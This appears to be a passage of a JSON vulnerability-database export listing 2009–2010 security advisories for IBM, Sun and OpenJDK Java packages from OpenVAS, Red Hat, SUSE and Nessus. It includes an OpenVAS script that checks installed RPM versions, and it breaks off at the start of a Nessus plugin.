"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0217", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1694.\n\nThe IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:66543", "href": "http://plugins.openvas.org/nasl.php?oid=66543", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1694", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1694.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1694 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1694.\n\nThe IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. 
To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66543);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-0217\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1694\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1694.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", 
rpm:\"java-1.6.0-ibm-demo~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", 
rpm:\"java-1.6.0-ibm-src~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. 
All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:19", "published": "2009-12-08T05:00:00", "id": "RHSA-2009:1647", "href": "https://access.redhat.com/errata/RHSA-2009:1647", "type": "redhat", "title": "(RHSA-2009:1647) Critical: java-1.5.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. 
All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-12-07T05:00:00", "id": "RHSA-2009:1643", "href": "https://access.redhat.com/errata/RHSA-2009:1643", "type": "redhat", "title": "(RHSA-2009:1643) Critical: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3555", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. 
All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T11:55:41", "published": "2009-12-23T05:00:00", "id": "RHSA-2009:1694", "href": "https://access.redhat.com/errata/RHSA-2009:1694", "type": "redhat", "title": "(RHSA-2009:1694) Critical: java-1.6.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555", "CVE-2009-3867", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3874", "CVE-2009-3875"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes various vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3555, CVE-2009-3867, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3874, CVE-2009-3875)\n\nFor the CVE-2009-3555 issue, this update disables renegotiation in the\nnon-default IBM JSSE2 provider for the Java Secure Socket Extension (JSSE)\ncomponent. The default JSSE provider is not updated with this fix. Refer to\nthe IBMJSSE2 Provider Reference Guide, linked to in the References, for\ninstructions on how to configure the IBM Java 2 Runtime Environment to use\nthe JSSE2 provider by default.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nWarning: Do not install these java-1.4.2-ibm packages for SAP alongside the\njava-1.4.2-ibm packages from the Red Hat Enterprise Linux Extras or\nSupplementary channels on the Red Hat Network. 
Doing so could cause your\nsystem to fail to update cleanly, among other possible problems.\n\nAll users of java-1.4.2-ibm for Red Hat Enterprise Linux 4 and 5 for SAP\nare advised to upgrade to these updated packages, which contain the IBM\n1.4.2 SR13-FP4 Java release. All running instances of IBM Java must be\nrestarted for this update to take effect.\n", "modified": "2017-09-08T12:08:08", "published": "2010-05-12T04:00:00", "id": "RHSA-2010:0408", "href": "https://access.redhat.com/errata/RHSA-2010:0408", "type": "redhat", "title": "(RHSA-2010:0408) Moderate: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The Sun 1.5.0 Java release includes the Sun Java 5 Runtime Environment and\nthe Sun Java 5 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 5 Runtime\nEnvironment and the Sun Java 5 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3873, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884)\n\nNote: This is the final update for the java-1.5.0-sun packages, as the Sun\nJava SE Release family 5.0 has now reached End of Service Life. 
The next\nupdate will remove the java-1.5.0-sun packages.\n\nAn alternative to Sun Java SE 5.0 is the Java 2 Technology Edition of the\nIBM Developer Kit for Linux, which is available from the Extras and\nSupplementary channels on the Red Hat Network. For users of applications\nthat are capable of using the Java 6 runtime, the OpenJDK open source JDK\nis included in Red Hat Enterprise Linux 5 (since 5.3) and is supported by\nRed Hat.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:51", "published": "2009-11-10T05:00:00", "id": "RHSA-2009:1571", "href": "https://access.redhat.com/errata/RHSA-2009:1571", "type": "redhat", "title": "(RHSA-2009:1571) Critical: java-1.5.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:39", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5349", "CVE-2009-1100", "CVE-2009-2625", "CVE-2009-3868", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.4.2 SR13-FP2 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes two vulnerabilities in the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit. These vulnerabilities are\nsummarized on the IBM \"Security alerts\" page listed in the References\nsection. (CVE-2008-5349, CVE-2009-2625)\n\nWarning: Do not install these java-1.4.2-ibm packages for SAP alongside the\njava-1.4.2-ibm packages from the Red Hat Enterprise Linux Extras or\nSupplementary channels on the Red Hat Network. 
Doing so could cause your\nsystem to fail to update cleanly, among other possible problems.\n\nAll users of java-1.4.2-ibm for Red Hat Enterprise Linux 4 and 5 for SAP\nare advised to upgrade to these updated packages, which contain the IBM\n1.4.2 SR13-FP2 Java release. All running instances of IBM Java must be\nrestarted for this update to take effect.", "modified": "2017-09-08T12:16:44", "published": "2009-11-04T05:00:00", "id": "RHSA-2009:1551", "href": "https://access.redhat.com/errata/RHSA-2009:1551", "type": "redhat", "title": "(RHSA-2009:1551) Moderate: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3729", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884", "CVE-2009-3886"], "description": "The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and\nthe Sun Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 6 Runtime\nEnvironment and the Sun Java 6 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3729, CVE-2009-3865,\nCVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884, CVE-2009-3886)\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues. 
All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:37", "published": "2009-11-09T05:00:00", "id": "RHSA-2009:1560", "href": "https://access.redhat.com/errata/RHSA-2009:1560", "type": "redhat", "title": "(RHSA-2009:1560) Critical: java-1.6.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. 
With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. 
(CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.", "modified": "2017-09-08T12:07:09", "published": "2009-11-16T05:00:00", "id": "RHSA-2009:1584", "href": "https://access.redhat.com/errata/RHSA-2009:1584", "type": "redhat", "title": "(RHSA-2009:1584) Important: java-1.6.0-openjdk security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:45:32", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 5 was updated to Service Refresh 11. 
It fixes lots of bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T09:21:12", "published": "2010-01-12T09:21:12", "id": "SUSE-SA:2010:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00001.html", "type": "suse", "title": "remote code execution in java-1_5_0-ibm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 6 was updated to Service Refresh 7.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:47:21", "published": "2010-01-12T17:47:21", "id": "SUSE-SA:2010:004", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00004.html", "title": "remote code execution in java-1_6_0-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:20:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "description": "The Sun Java 6 SDK/JRE was updated to the u17 update, fixing bugs and various security issues:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-11-19T17:02:05", "published": "2009-11-19T17:02:05", "id": "SUSE-SA:2009:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00010.html", "title": "remote 
code execution in java-1_6_0-sun", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "description": "IBM Java 1.4.2 was updated to 13 FP3.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:42:00", "published": "2010-01-12T17:42:00", "id": "SUSE-SA:2010:003", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00003.html", "title": "remote code execution in java-1_4_2-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T13:07:16", "description": "Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. 
All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.", "edition": 29, "published": "2009-12-08T00:00:00", "title": "RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo"], "id": "REDHAT-RHSA-2009-1643.NASL", "href": "https://www.tenable.com/plugins/nessus/43048", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1643. 
